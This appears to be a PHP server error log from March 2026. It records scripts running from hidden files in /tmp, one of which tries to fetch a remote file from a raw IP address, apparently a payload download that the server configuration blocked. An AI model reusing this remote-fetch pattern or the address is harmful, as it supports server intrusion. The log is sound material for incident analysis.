[10-Mar-2026 09:00:24 UTC] PHP Warning:  file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /tmp/.internal on line 1
[10-Mar-2026 09:00:24 UTC] PHP Warning:  file_get_contents(http://213.209.159.254/tmp/kkEvioMGrx): Failed to open stream: no suitable wrapper could be found in /tmp/.internal on line 1
[10-Mar-2026 15:40:20 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.parle_tokens on line 2
[13-Mar-2026 13:46:47 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.oauthexceptions on line 1
[13-Mar-2026 22:25:28 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.config on line 2
[14-Mar-2026 05:07:43 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.center on line 8
